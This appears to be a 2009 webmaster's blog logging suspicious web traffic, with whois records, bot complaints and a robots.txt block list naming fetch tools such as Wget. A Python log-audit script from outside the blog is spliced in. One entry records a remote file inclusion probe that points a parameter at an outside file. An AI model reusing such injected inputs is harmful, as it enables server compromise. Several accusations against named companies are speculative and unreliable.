Monday, June 29, 2009

Embarq Corporation - Malformed web requests

We are getting malformed web requests from this IP address on the Embarq Corporation network:

67.237.204.65

In fact we have seen a lot of bad traffic from Embarq network address ranges in the past.

OrgName: Embarq Corporation
OrgID: EMBAR
Address: 500 N New York Ave
City: Winter Park
StateProv: FL
PostalCode: 32789
Country: US

NetRange: 67.232.0.0 - 67.239.255.255

Friday, June 26, 2009

XLHost - Trying to access our sites programmatically

XLHost IP ranges continue to try to access our sites programmatically:

eNET Inc. ENET-XLHOST-2 (NET-173-45-64-0-1)
173.45.64.0 - 173.45.127.255
XLHost.com Inc XLHOST-DTODD1-5959 (NET-173-45-70-176-1)
173.45.70.176 - 173.45.70.183

Bad requests - Verizon

Got over 1200 bad requests from this IP on the Verizon network today: 71.176.87.58

OrgName: Verizon Internet Services Inc.
OrgID: VRIS
Address: 1880 Campus Commons Dr
City: Reston
StateProv: VA
PostalCode: 20191
Country: US

NetRange: 71.173.96.0 - 71.180.255.255
CIDR: 71.173.96.0/19, 71.173.128.0/17, 71.174.0.0/15, 71.176.0.0/14, 71.180.0.0/16
NetName: VIS-BLOCK
NetHandle: NET-71-173-96-0-1
Parent: NET-71-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.BELLATLANTIC.NET
NameServer: NS2.BELLATLANTIC.NET
NameServer: NS2.VERIZON.NET
NameServer: NS4.VERIZON.NET

Strange requests / odd headers

We're getting strange requests on our server for files we don't host like this:

ip: 69.72.169.233

query string: path[docroot]=http://barrasford.net/barras/1.swf??

Fri Jun 26 15:39:20 PDT 2009

User Agent: Mozilla/5.0

Headers:

TE: deflate,gzip;q=0.3

Connection: TE, close

Thursday, June 25, 2009

author.dll

A bot called core-project is coming from different URLs and attempting to access something called author.dll on our server:


6/19/2009 11:03:08 PM 125.244.77.2 /_vti_bin/_vti_aut/author.dll core-project/1.0 POST
6/18/2009 3:14:16 PM 62.212.123.125 /_vti_bin/_vti_aut/author.dll core-project/1.0

Wednesday, June 24, 2009

Alaska Communications Group

Based on recent activity on my server, I have a hunch there are hackers coming out of this network but couldn't prove it at the moment. Will have to keep an eye on this...

OrgName: Alaska Communications Systems Group, Inc.
OrgID: ACSG-1
Address: c/o ACS Internet, Inc.
Address: 600 Telephone Ave.
City: Anchorage
StateProv: AK
PostalCode: 99503
Country: US

ReferralServer: rwhois://rwhois.acsalaska.net:4321

NetRange: 216.67.0.0 - 216.67.127.255

Tuesday, June 23, 2009

Turnitin Bot - Odd behavior

Turnitin bot is requesting pages and types of technology that haven't existed on one of our sites for years - probably over five years.

First question is - where are they even getting these links?

Second question is - why are they not obeying robots.txt for this site?

Turnitin bot is on this network:

O1.com NETBLK-O1-BLK4 (NET-65-98-128-0-1)
65.98.128.0 - 65.98.255.255
iParadigms, LLC NETBLK-65-98-224-0 (NET-65-98-224-0-1)
65.98.224.0 - 65.98.224.31

SuperPages Bot - Bogus Requests?

The SuperPages bot is submitting web requests that don't appear to be true. I'm not even sure if this bot is really from super pages. It lists a particular web page as the referrer, but after visiting that web page, there are clearly no links to our sites on that page. Obviously the bot is making up bogus information that could skew marketing results. I hope people are also not paying for bogus clicks from this company as a result of this activity.

The IP address from which the bogus web request came: 151.138.13.244

Suspicious Login Activity

I just logged into my web server. First connect to VPN, then type in admin password.

I typed in the administrator password numerous times. I know it was exactly the right password. I must have typed it 10 or 20 times. I even typed it out in Notepad so I could see what I was typing to verify I was typing the right thing.

About the 20th attempt - suddenly the password worked. This is the same password I typed each time over and over again very carefully after it failed the first few times.

Something very strange is going on...time to change passwords.

Friday, June 19, 2009

AT&T Wireless - Reports people in Florida when Not

AT&T Wireless reports people as logging in from Florida using their laptop connect cards when they are at the opposite side of the country. You'd think with all the work on GPS and the government mandate regarding pinpointing people's locations when they are on cell phones for 911 calls that they would also accurately pinpoint locations when using laptop connect cards.

This is the network you get when you look up the associated IP addresses:

OrgName: AT&T Global Network Services, LLC
OrgID: ATGS
Address: 3200 Lake Emma Road
City: Lake Mary
StateProv: FL
PostalCode: 32746
Country: US

NetRange: 32.0.0.0 - 32.255.255.255

Perhaps this is for security reasons or otherwise, I'm not sure, but if they are serving up an IP in LA or Seattle it seems like they could pull it from an associated IP range mapped to that city so locations can be accurately reported in logs.

This is like AOL's IP address reporting, which basically does the same thing. Everyone is in Virginia according to their IP ranges.

Thursday, June 18, 2009

Mail.Ru/1.0 not obeying Robots.txt

This bot, Mail.Ru/1.0, read robots.txt, ignored it and tried to access a page anyway from this IP address: 94.100.181.242

Wednesday, June 17, 2009

GoogleImageBot

We have a site where we disallow the Google image bot. We started putting the photos on a sub-domain of that web site. Google-bot apparently scanned and put all the images on that sub-domain on the net even though our robots.txt file for that site tells Google to bug off and there's no link to those images except from our site.

Tuesday, June 16, 2009

Comodo - unwanted traffic

There is some obvious web request manipulation going on from this network which hosts the "comodo SSL checker" bot:

inetnum: 91.209.196.0 - 91.209.196.255
netname: COMODO
descr: Comodo CA Ltd
country: GB

FollowSite Bot

FollowSite Bot ( http://www.followsite.com/bot.html ) is not obeying robots.txt on our server.

AOL Hacker

Getting bombed with abusive traffic repeatedly by someone on AOL. We've reported this malicious traffic to AOL a number of times and still it continues. We've finally just had to completely block the IPs in this range:

205.188.116.0-205.188.117.255

Websense

After asking Websense to please stop hitting our web sites with clearly altered or bogus traffic - they proceeded to hit all our web sites repeatedly with such traffic. This is not very nice behavior. They could have emailed me back to explain what they are doing and why instead of trying to continue to bomb our web sites.

Websense does security research which I appreciate, however I do not appreciate the bogus traffic they are sending to our web sites constantly. A check once in a while would be fine but they hit the sites repeatedly every day. This seems a bit excessive.

Seriously we have a handful of local sites. Do they need to hit them three times a day??

Websense (WEBSEN-1)
Websense Network Operations Center (WNOC-ARIN) arin@websense.com +1-858-320-8000
Websense, Inc (AS13448) WEBSENSE 13448
Websense TWTC-NETBLK-4 (NET-66-194-6-0-1) 66.194.6.0 - 66.194.6.255
Websense Inc12036038 SBC06711720112828040601125225 (NET-67-117-201-128-1) 67.117.201.128 - 67.117.201.143

Bad request - Pocketinet

Our web servers just went down for some reason. Right before the problem we got a bad web request from this ip address and network ...and additionally they attempted to access the site using Wget.

64.185.119.190

Pocketinet Communications, Inc POCKETINET-1 (NET-64-185-96-0-1)
64.185.96.0 - 64.185.127.255
PocketInet POCKETINET-BG-2 (NET-64-185-119-128-1)
64.185.119.128 - 64.185.119.255

Yeah OK we could be more scalable - but it's just some little local web sites.

Monday, June 15, 2009

Strange traffic - related?

Getting some weird web requests right now and wondering if traffic from these IPs is somehow related:

209.112.190.24

OrgName: Alaska Communications Systems Group, Inc.
OrgID: ACSG-1
Address: c/o ACS Internet, Inc.
Address: 600 Telephone Ave.
City: Anchorage
StateProv: AK
PostalCode: 99503
Country: US

72.192.71.233
Cox Communications Inc. NETBLK-COX-ATLANTA-11 (NET-72-192-0-0-1)
72.192.0.0 - 72.223.255.255
Cox Communications NETBLK-OK-RDC-72-192-64-0 (NET-72-192-64-0-1)
72.192.64.0 - 72.192.127.255


69.50.139.225
NationalNet, Inc. NATL-MACH10-NET (NET-69-50-128-0-1)
69.50.128.0 - 69.50.143.255
WTS MACH10-WTS (NET-69-50-139-128-1)
69.50.139.128 - 69.50.139.255

170.35.224.64
OrgName: BellSouth Cellular Corp.
OrgID: BCC-12
Address: 12555 Cingular Way
Address: Suite 4360
City: Alpharetta
StateProv: GA
PostalCode: 30041
Country: US

NetRange: 170.35.0.0 - 170.35.255.255

SuperPages bot traffic

Why is the SuperPages bot

a.) not obeying robots.txt
b.) getting referred from this web site: http://www.clearwatergazette.com
c.) hitting a site that we are not running super pages ads on...

The traffic is coming from:

OrgName: Idearc Media Corp
OrgID: IMC-97
Address: 2200 W Airfield Drive
City: DFW Airport
StateProv: TX
PostalCode: 75261
Country: US

NetRange: 151.138.0.0 - 151.138.255.255

Thursday, June 11, 2009

MSR-ISRCCrawler not obeying robots.txt

Strangely, MSR-ISRCCrawler checked robots.txt. It clearly says in our robots.txt file that this bot is disallowed. Then it proceeded to crawl our site anyway. Hmm...

Cogentco - bad traffic again.

38.100.41.112

Cogentco is at it again. Actually now when you look up this IP address it doesn't say Cogentco anymore it says PSINet but same thing. They are hitting our sites with clearly garbage traffic. We've blocked them out and show a blatant error message but traffic persists.

It's pretty clear that the traffic in question is both automated and not valid as this particular IP: 38.100.41.112 has just hit all the pages in a site selling.

In June.

Cogentco / PSINet traffic is bad news. You may want to watch and potentially block it on your server.

OrgName: PSINet, Inc.
OrgID: PSI
Address: 1015 31st St NW
City: Washington
StateProv: DC
PostalCode: 20007
Country: US
NetRange: 38.0.0.0 - 38.255.255.255

Today's robots.txt file

If you're trying to prevent most automated traffic except major search engines on a particular web site, here's a robots.txt file. Note that not all of these are actually bots, and some things like Python, Perl and Java agents running around the Internet and used by hackers don't obey or even check robots.txt, so you'll have to use other ways to monitor and handle this traffic on your web site.


User-Agent: FollowSiteBot
Disallow: /

User-Agent: nambu
Disallow: /

User-Agent: uberbot
Disallow: /

User-Agent: KaloogaBot
Disallow: /

User-Agent: Yeti
Disallow: /

User-Agent: Servage
Disallow: /

User-Agent: ServageRobot
Disallow: /

User-Agent: Trident
Disallow: /

User-Agent: uw_cse_xwc
Disallow: /

User-Agent: ZupeeCrawler
Disallow: /

User-Agent: Webspider
Disallow: /

User-Agent: LinkAider
Disallow: /

User-Agent: Axonize-bot
Disallow: /

User-Agent: ips-agent
Disallow: /

User-Agent: RiceComputerArchitecture
Disallow: /

User-Agent: AISearchBot
Disallow: /

User-Agent: flatlandbot
Disallow: /

User-Agent: FairShare
Disallow: /

User-Agent: SapphireWebCrawler
Disallow: /

User-Agent: LocalBot
Disallow: /

User-Agent: LaBot
Disallow: /

User-Agent: Butterfly
Disallow: /

User-Agent: robotgenius
Disallow: /

User-Agent: WillyBot
Disallow: /

User-Agent: GingerCrawler
Disallow: /

User-Agent:larbin
Disallow: /

User-Agent: ru_com_viewer
Disallow: /

User-Agent:Yandex
Disallow: /

User-Agent:yandex
Disallow: /

User-Agent:msnbot-media
Disallow: /

Sitemap: http://www.rainierrhododendrons.com/sitemap.xml

User-Agent:del.icio.us
Disallow: /

User-Agent:Sika
Disallow: /

User-Agent:whois.de
Disallow: /

User-Agent:Isidorus
Disallow: /

User-Agent:Yanga
Disallow: /

User-Agent:MSR-ISRCCrawler
Disallow: /

User-Agent:Snappybot
Disallow: /

User-Agent:Gaisbot
Disallow: /

User-Agent:SapphireWebCrawler
Disallow: /

User-Agent:BobCrawl
Disallow: /

User-Agent:OpenX
Disallow: /

User-Agent:Axonize-bot
Disallow: /

User-Agent:KaloogaBot
Disallow: /

User-Agent:kalooga
Disallow: /

User-Agent:OnTownsBot
Disallow: /

User-Agent:Cazoodle-Bot
Disallow: /

User-Agent: REAP-Crawler
Disallow: /

User-Agent: DotBot
Disallow: /

User-Agent: Gigabot
Disallow: /

User-Agent: NetcraftSurveyAgent
Disallow: /

User-Agent: SurveyBot
Disallow: /

User-Agent: DBLBot
Disallow: /

User-Agent: AISearchBot
Disallow: /

User-Agent: Charlotte
Disallow: /

User-agent: IntegraTelecom
Disallow: /

User-agent: PSIBots
Disallow: /

User-agent:Websense
Disallow: /

User-agent:HornySexSearch
Disallow: /

User-agent: SnapPreviewBot
Disallow: /

User-agent: Snoopy
Disallow: /

User-agent: libwww-perl
Disallow: /

User-agent: nexen
Disallow: /

User-agent: phpversion
Disallow: /

User-agent: attributor
Disallow: /

User-agent: Java
Disallow: /

User-agent: bsalsa
Disallow: /

User-agent: whoisde.de
Disallow: /

User-agent: envolk
Disallow: /

User-agent: QEAVis
Disallow: /

User-agent: NextGenSearchBot
Disallow: /

User-agent: boitho.com
Disallow: /

User-agent: boitho
Disallow: /

User-agent: Wget
Disallow: /

User-agent: Rankivabot
Disallow: /

User-agent: T-Online Browser
Disallow: /

User-agent: webalta
Disallow: /

User-agent: page_prefetcher
Disallow: /

User-agent: cyberpatrol
Disallow: /

User-agent: sitecat
Disallow: /

User-agent: cyberpatrolcrawler
Disallow: /

User-agent: internetseer
Disallow: /

User-agent: searchme
Disallow: /

User-agent: dcbot
Disallow: /

User-agent: scoutjet
Disallow: /

User-agent: sphsearch
Disallow: /

User-agent: exabot
Disallow: /

User-agent: NaverBot
Disallow: /

User-agent: naverbot
Disallow: /

User-agent: twiceler
Disallow: /

User-agent: zermelo
Disallow: /

User-agent: Moozilla
Disallow: /

User-agent: kyluka
Disallow: /

User-agent: scoutjet
Disallow: /

User-agent: baiduspider
Disallow: /

User-agent: MLBot
Disallow: /

User-agent: worio
Disallow: /

User-agent: turnitinbot
Disallow: /

User-agent: exooba
Disallow: /

User-agent: ViolaBot
Disallow: /

User-agent: speedyspider
Disallow: /

User-agent: becomebot
Disallow: /

# disallow Googlebot-Image
User-agent: Googlebot-Image
Disallow: /

User-agent: MJ12bot
Disallow: /

User-agent: QEAVis
Disallow: /

User-agent: VWBot
Disallow: /

User-agent: ShopWiki
Disallow: /

User-agent: SnapPreviewBot
Disallow: /

User-agent: panscient.com
Disallow: /

User-agent: panscient
Disallow: /

User-agent: sproose
Disallow: /

User-agent: voyager
Disallow: /

User-agent: grub
Disallow: /

User-agent: libwww-perl
Disallow: /

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: Twiceler
Disallow: /

User-agent: WebDataCentreBot
Disallow: /

User-agent: OOZBOT
Disallow: /

User-agent: setooz
Disallow: /

User-agent: bsalsa
Disallow: /

User-agent: perl
Disallow: /

User-agent: botmobi
Disallow: /

User-agent: NextGenSearchBot
Disallow: /

User-agent: ASPSimply
Disallow: /

User-agent: Python-urllib
Disallow: /

User-agent: Moozilla
Disallow: /

User-agent: voilabot
Disallow: /

User-agent: WGet
Disallow: /

User-agent: obot
Disallow: /

User-agent: Java
Disallow: /

User-agent: libcurl-agent
Disallow: /

User-agent: phpversion
Disallow: /

User-agent: therarestparser
Disallow: /

User-agent: Jakarta Commons-HttpClient
Disallow: /
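Since agents like the ones listed above either skip robots.txt or read it and crawl anyway, the other way to catch them is in the access log. As an added example (not code from this blog), the Python below reads combined-format log lines and flags, per client, pages fetched despite a matching Disallow token and clients that crawled several pages without ever requesting robots.txt. The robots.txt is a subset of the file above; the log lines and the 192.0.2.x addresses are constructed.

```python
"""Audit an access log for crawlers that ignore robots.txt (added example)."""
import re
# Subset of the robots.txt above; tokens are matched as substrings of the UA.
ROBOTS_TXT = """\
User-Agent: KaloogaBot
Disallow: /

User-Agent: LocalBot
Disallow: /

User-agent:Python-urllib
Disallow: /
"""

# Constructed combined-log lines; 192.0.2.0/24 is documentation address space.
ACCESS_LOG = """\
192.0.2.1 - - [15/Jun/2009:10:01:02 -0700] "GET /robots.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)"
192.0.2.1 - - [15/Jun/2009:10:01:03 -0700] "GET /products.html HTTP/1.1" 200 8812 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)"
192.0.2.2 - - [15/Jun/2009:10:02:10 -0700] "GET /index.html HTTP/1.1" 200 4021 "-" "LocalBot/1.0"
192.0.2.2 - - [15/Jun/2009:10:02:11 -0700] "GET /about.html HTTP/1.1" 200 3310 "-" "LocalBot/1.0"
192.0.2.2 - - [15/Jun/2009:10:02:12 -0700] "GET /contact.html HTTP/1.1" 200 2100 "-" "LocalBot/1.0"
192.0.2.3 - - [15/Jun/2009:10:03:44 -0700] "GET /about.html HTTP/1.1" 200 3310 "-" "Python-urllib/2.5"
192.0.2.4 - - [15/Jun/2009:10:05:30 -0700] "GET /index.html HTTP/1.1" 200 4021 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
192.0.2.4 - - [15/Jun/2009:10:05:41 -0700] "GET /about.html HTTP/1.1" 200 3310 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
"""

# Browsers never fetch robots.txt either, so "no robots.txt" only counts once a client has pulled this many pages.
MIN_PAGES = 3

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+)[^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')


def parse_robots(text):
    """Return [(agent_tokens, disallowed_prefixes), ...]; 'User-Agent:larbin' style is accepted."""
    groups, agents, paths = [], [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0]
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        if field.lower() == "user-agent":
            if paths:  # rules already seen: this line starts a new group
                groups.append((agents, paths))
                agents, paths = [], []
            agents.append(value.lower())
        elif field.lower() == "disallow" and agents and value:
            paths.append(value)
    if agents and paths:
        groups.append((agents, paths))
    return groups


def disallowed(groups, ua, path):
    """True if a group's token occurs in the UA and that group blocks path. Substring
    matching is deliberate: bare tokens like 'Java' or 'Python-urllib' need it."""
    ua_l = ua.lower()
    return any(any(a == "*" or a in ua_l for a in agents)
               and any(path.startswith(p) for p in paths)
               for agents, paths in groups)


def audit(log_text=ACCESS_LOG, robots_text=ROBOTS_TXT, min_pages=MIN_PAGES):
    """Return {(ip, ua): [finding, ...]} for clients that ignored robots.txt."""
    groups = parse_robots(robots_text)
    fetched_robots, pages = set(), {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the audit
        key = (m["ip"], m["ua"])
        if m["path"].split("?", 1)[0] == "/robots.txt":
            fetched_robots.add(key)
        else:
            pages.setdefault(key, set()).add(m["path"])
    findings = {}
    for key, paths in pages.items():
        problems = []
        blocked = sorted(p for p in paths if disallowed(groups, key[1], p))
        if blocked:
            problems.append("fetched disallowed: " + ", ".join(blocked))
        if key not in fetched_robots and len(paths) >= min_pages:
            problems.append("crawled %d pages without reading robots.txt" % len(paths))
        if problems:
            findings[key] = problems
    return findings
```

Running `audit()` on the constructed log reports KaloogaBot (read robots.txt, crawled anyway), LocalBot (never read it, three disallowed pages) and Python-urllib, while the Firefox visitor produces no finding.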

FollowSiteBot

The FollowSiteBot...

Not checking robots.txt like a good little bot...

FollowSiteBot came from this network today: 74.86.223.42

SoftLayer Technologies Inc. SOFTLAYER-4-4 (NET-74-86-0-0-1)
74.86.0.0 - 74.86.255.255
ASX Networks ApS NET-74-86-223-40 (NET-74-86-223-40-1)
74.86.223.40 - 74.86.223.47

uberbot - misbehaving

uberbot is not obeying robots.txt

Today's Bot Traffic - a lot of Twitter Referrals

We got hit with a lot of bots today. It seems that a great deal of this may be caused by Twitter posts.

14 174.129.124.97 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
13 67.202.8.12 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
12 75.101.139.240 Python-urllib/1.17 GET 6 2009 10
11 174.129.123.212 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
8 216.24.131.119 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Me.dium/1.0 (http://me.dium.com) GET 6 2009 10
8 216.24.131.119 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Me.dium/1.0 (http://me.dium.com) HEAD 6 2009 10
6 64.73.66.94 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618) GET 6 2009 10
6 195.210.57.83 Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler) GET 6 2009 10
6 130.76.32.16 Mozilla/4.0 (compatible;) GET 6 2009 10
5 216.100.200.126 Mozilla/4.0 (compatible;) GET 6 2009 10
3 130.76.32.181 Mozilla/4.0 (compatible;) GET 6 2009 10
3 174.129.168.229 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
2 174.129.118.37 Python-urllib/2.5 GET 6 2009 10
2 208.74.66.43 libwww-perl/5.825 GET 6 2009 10
2 174.129.89.199 Python-urllib/2.5 GET 6 2009 10
2 67.220.192.206 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729) GET 6 2009 10
2 67.112.74.47 Mozilla/4.0 (compatible;) GET 6 2009 10
1 67.202.58.81 rdfbot/1.0 (rdfbotsupport AT rediffmailpro DOT com) GET 6 2009 10
1 69.58.178.33 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7 GET 6 2009 10
1 67.23.27.247 Nambu URL Destination Determinator +bot http://nambu.com GET 6 2009 10
1 67.23.27.250 Nambu URL Destination Determinator +bot http://nambu.com GET 6 2009 10
1 75.101.178.247 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
1 174.129.224.58 PycURL/7.19.0 GET 6 2009 10
1 174.129.104.29 Python-urllib/2.5 GET 6 2009 10
1 174.129.223.229 uberbot 1.0 HEAD 6 2009 10

Wednesday, June 10, 2009

Twitturly - bad bot on Amazon network

Whatever Twitturly is it is not obeying robots.txt. It came from the Amazon network at this IP address: 174.129.88.144

Additionally it came in conjunction with a number of other bots that hit this particular site at the same time. I assume it was because the web site owner posted her site somewhere that is being monitored by bots. Unfortunately the bots seem to be misbehaving.

LocalBot not checking Robots.txt

Something coming from this IP: 121.138.194.106 called LocalBot is not checking robots.txt files. Annoying.

Tons of hits from 204.16.231.98 - Sparkplug, Inc.

Not sure why, but our web sites are getting what seems to be an excessive number of hits from the Sparkplug, Inc. network in Chicago.

The particular IP address doing the traffic generation is: 204.16.231.98

OrgName: Sparkplug, Inc.
OrgID: SPARK-3
Address: 303 W. Erie
Address: Suite 300
City: Chicago
StateProv: IL
PostalCode: 60610
Country: US
NetRange: 204.16.228.0 - 204.16.231.255

The traffic hitting our server seems to be focused on a particular web site that serves local customers for the particular business - who are not in Chicago.

Maybe this is just someone admiring the work on our web sites, I am not sure...seems a little odd however.

Tuesday, June 09, 2009

VeriSign - unwanted traffic

Why is Verisign hitting our sites repeatedly with unwanted traffic?

This IP address: 69.58.178.33 was hitting one of our sites repeatedly from 6/8/2009 8:19:33 PM to 6/8/2009 8:19:57 PM.

So what? The site is advertising the sale of Christmas wreaths and this is JUNE. It's the middle of the summer and obviously no one at Verisign is interested in buying Christmas wreaths.

The IP or computer/server at Verisign scanned this site and hit 25 different pages. Obviously this is not someone reviewing the site to buy something, and obviously there is some automated software on this server at Verisign doing something on our servers - who knows for what or why. It definitely was not for any service requested by us.

Here's the Verisign network in question:

OrgName: VeriSign Infrastructure & Operations
OrgID: VIO-2
Address: 21345 Ridgetop Circle
City: Dulles
StateProv: VA
PostalCode: 20166
Country: US
NetRange: 69.58.176.0 - 69.58.191.255

Norton - Update Not Working?

I set up Norton Anti-Virus on a new machine recently and when I did, I noticed that it looked different than the version of Norton running on my other machine. I installed Norton on this other machine probably close to a year ago but I have updated it regularly since then.

So is the problem that Norton Antivirus is not actually updating, or if you have an old version do they just leave parts of it intact so it doesn't look completely like the new version?

With this and my last post about Adobe Acrobat - seems like you may want to frequently uninstall and reinstall certain software that may have been affected by malware or viruses.

Perhaps vendors also need a better way to verify that their update process is working.

Adobe Acrobat Reader - Update Not Working?

I typically update all my software fairly regularly. I noticed a while ago that I have an old version of Adobe Acrobat Reader even after doing the updates many times. I finally decided to uninstall Adobe Acrobat Reader 8.something so I could install the latest version.

I was reminded that I need to do this when I went to the Secunia web site and saw the latest Adobe Acrobat Reader advisory - which unfortunately includes version 9:

Adobe Acrobat Reader - Memory Corruption Vulnerability

This particular vulnerability above is only confirmed for Linux but chances are it occurs on other operating systems as well.

Additionally, recently someone I know was using Adobe and some rogue JavaScript code caused him some problems on one of his machines - which is how I got into looking at the whole Adobe Acrobat Reader update problem in the first place.

Interestingly enough, after uninstalling Adobe Acrobat Reader version 8, I tried to go to the Adobe web site, and when I clicked the link to install the most recent version of Adobe I got an error saying my IP was blocked. Ok so I'll just jump on a different network. That IP was blocked too. Ok that's odd. I went to a completely different machine and was able to click the download link. So I came back to document all of this in my blog - and suddenly now I can download again.

One thing I don't like about Adobe's web site is that the download is in HTTP, not HTTPS. How do we know files and bits and bytes aren't getting altered in transit?

Monday, June 08, 2009

Rundll.exe and task manager

When I pulled up task manager a process - I think using rundll.exe was running and disappeared shortly after opening the task manager. I have noticed a lot of times when I open the task manager whatever was hung up on my computer suddenly starts working. This leads me to wonder if some malware is designed to automatically shut off if the task manager is opened as users are getting hip to the fact that extraneous processes running could mean trouble...

Would be nice to have a button in task manager to easily get to some log of what was recently running on your computer as well as what is currently running.

Thursday, June 04, 2009

Malware - DigExt?

Had a user cross our site today that hit our site with numerous bad URLs obviously looking for some type of hack.

Time/Date: 6/4/2009 9:04:23 PM
The user agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)
IP Address: 204.16.231.98

They came from this network:

OrgName: Sparkplug, Inc.
OrgID: SPARK-3
Address: 303 W. Erie
Address: Suite 300
City: Chicago
StateProv: IL
PostalCode: 60610
Country: US

ReferralServer: rwhois://rwhois.sparkplugbb.net:4321/

NetRange: 204.16.228.0 - 204.16.231.255

Hotstocked.com - RateItAll

[NOTE: HotStocked.com as it was seems to have gone away - probably due to all the complaints about malicious and inaccurate information. It now is a completely different site.]

Had problems with web sites posting incorrect or harmful information about you and having a problem getting it removed?

You can post your comments about these web sites at RateItAll.com

For instance someone I know is having problems getting their name removed from HotStocked.com which has posted a lot of incorrect information about people and refuses to remove it upon request.

Add your comments about HotStocked.com:
http://www.rateitall.com/i-995297-hotstockedcom.aspx

For an example of the type of posts you'll find on Hotstocked.com, which are derogatory and probably personal attacks and altercations rather than useful information, search the site for negative postings about people and requests for removal that have not been granted. I'm sure you'll quickly find that Hotstocked.com is full of spammy, personal content and most likely fabricated information about people posted by those who dislike them for whatever reason.

Wednesday, June 03, 2009

Moozilla

We get repeated hits from a user agent called Moozilla. The hits will come from a bunch of different IP addresses on the Netscape/AOL network in succession. Sample hits:

6/1/2009 17:46 207.200.116.73 Moozilla
6/1/2009 17:46 207.200.116.131 Moozilla
6/1/2009 17:46 207.200.116.135 Moozilla
6/1/2009 17:46 207.200.116.136 Moozilla
6/1/2009 17:46 207.200.116.5 Moozilla
6/1/2009 17:46 207.200.116.12 Moozilla
6/1/2009 17:46 207.200.116.135 Moozilla
6/1/2009 17:46 207.200.116.136 Moozilla
6/1/2009 17:46 207.200.116.5 Moozilla
6/1/2009 17:46 207.200.116.12 Moozilla
6/1/2009 17:46 207.200.116.67 Moozilla
6/1/2009 17:46 207.200.116.6 Moozilla
6/1/2009 17:46 207.200.116.65 Moozilla

We have sent specific messaging back to this bot or software and contacted AOL about the problem but the particular traffic continues. When this particular software hits, it generates hundreds of hits on our web site in succession and does not behave like a normal web user.

The network reported generating this traffic is Netscape (now owned by AOL).

OrgName: Netscape Communications Corp.
OrgID: NSCP
Address: 501 E. Middlefield
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US

NetRange: 207.200.64.0 - 207.200.127.255

SurveyBot - Compass Communications

The SurveyBot from Whois.sc, hosted at Compass Communications, apparently located at the Westin Building in Seattle, is not obeying our robots.txt files.

OrgName: Compass Communications, Inc.
OrgID: CPCM
Address: 2001 6th Avenue
Address: Suite 3205
City: Seattle
StateProv: WA
PostalCode: 98121
Country: US

NetRange: 216.145.0.0 - 216.145.31.255

Some others have been asking about this particular bot on forums:

Compass Communications

I do not particularly appreciate the fact that they scrape web content during their visits.

Tuesday, June 02, 2009

Another Google Bot Impostor

Just got hit by another Google bot impostor:

216.240.151.50
6/2/2009 4:20:59 PM
Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)


OrgName: ATMLINK, INC.
OrgID: ATMLIN
Address: 600 W. 7th Street
Address: Suite 360
City: Los Angeles
StateProv: CA
PostalCode: 90017
Country: US

NetRange: 216.240.128.0 - 216.240.159.255

AT&T Wireless Doesn't Report Accurate Location

Interesting - Using AT&T Wireless card in Seattle reports an IP address that makes it look like I'm in Florida.

OrgName: AT&T Global Network Services, LLC
OrgID: ATGS
Address: 3200 Lake Emma Road
City: Lake Mary
StateProv: FL
PostalCode: 32746
Country: US

NetRange: 32.0.0.0 - 32.255.255.255